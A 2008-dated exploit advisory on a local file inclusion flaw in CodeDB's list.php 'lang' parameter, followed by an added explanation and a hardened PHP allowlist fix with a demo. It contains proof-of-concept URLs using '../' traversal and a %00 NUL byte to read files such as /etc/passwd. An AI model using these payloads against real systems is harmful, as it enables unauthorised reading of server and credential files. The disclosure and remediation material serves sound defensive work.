# Title : CodeDB (list.php lang) Local File Inclusion Vulnerability
# Published : 2008-07-14
# Author : cOndemned
###############################################################################
#
# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability
# Author : cOndemned
# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
#
###############################################################################
Source :
// list.php
$lang = htmlspecialchars($_GET['lang']); // ok, but.... for what ? lol
// ...
if(file_exists('templates/'.$lang.'_middle.php')) // We'll have to cut off rest of filename & extension
    include('templates/'.$lang.'_middle.php'); // Ekhm... pwned ;d
Proof of Concept :
http://[host]/[codeDB_path]/list.php?lang=../readme.txt%00
http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd%00
http://[host]/[codeDB_path]/list.php?lang=../[local_file]%00
EoF.
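
htmlspecialchars() only escapes HTML metacharacters, so "../" sequences and the trailing %00 reach file_exists() and include() unchanged (NUL-byte truncation of the appended "_middle.php" applies to PHP releases before 5.3.4). The following is an added example, not CodeDB's code and not from the advisory author, of a hardened lookup that maps lang through an allowlist and confirms the canonical path stays inside the template directory; the function name, the language codes and the temporary demo directory are assumptions.

```php
<?php
// Added example: hardened replacement for the include() in list.php.
// resolve_lang_template(), ALLOWED_LANGS and the demo directory are
// assumptions for illustration; they are not CodeDB's real names or values.
declare(strict_types=1);

const ALLOWED_LANGS = ['en', 'pl'];   // hypothetical set of shipped languages
const DEFAULT_LANG  = 'en';

function resolve_lang_template(string $templateDir, ?string $requested): string
{
    // Strict allowlist match: "../", "/" and NUL bytes can never compare equal
    // to a known language code, so the request falls back to the default.
    $lang = in_array($requested, ALLOWED_LANGS, true) ? $requested : DEFAULT_LANG;

    $base = realpath($templateDir);
    $path = realpath($templateDir . '/' . $lang . '_middle.php');

    // Defence in depth: the canonical path must sit inside the template
    // directory (this also catches a symlinked template pointing elsewhere).
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($base === false || $path === false
        || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('language template not found');
    }
    return $path;
}

// Demo with a constructed template directory and constructed inputs.
$dir = sys_get_temp_dir() . '/codedb_demo_' . getmypid() . '/templates';
mkdir($dir, 0700, true);
foreach (ALLOWED_LANGS as $code) {
    file_put_contents("$dir/{$code}_middle.php", "<?php /* $code */");
}

$inputs = ['pl', "../readme.txt\0", "../../../../etc/passwd\0", null];
foreach ($inputs as $in) {
    // In list.php the call would be: include resolve_lang_template(...);
    echo json_encode($in), ' => ', basename(resolve_lang_template($dir, $in)), PHP_EOL;
}

// Clean up the constructed files.
array_map('unlink', glob("$dir/*_middle.php"));
rmdir($dir);
rmdir(dirname($dir));
```

Only the allowlisted code "pl" selects its own template; the traversal strings from the proof of concept and a missing parameter all resolve to the default template.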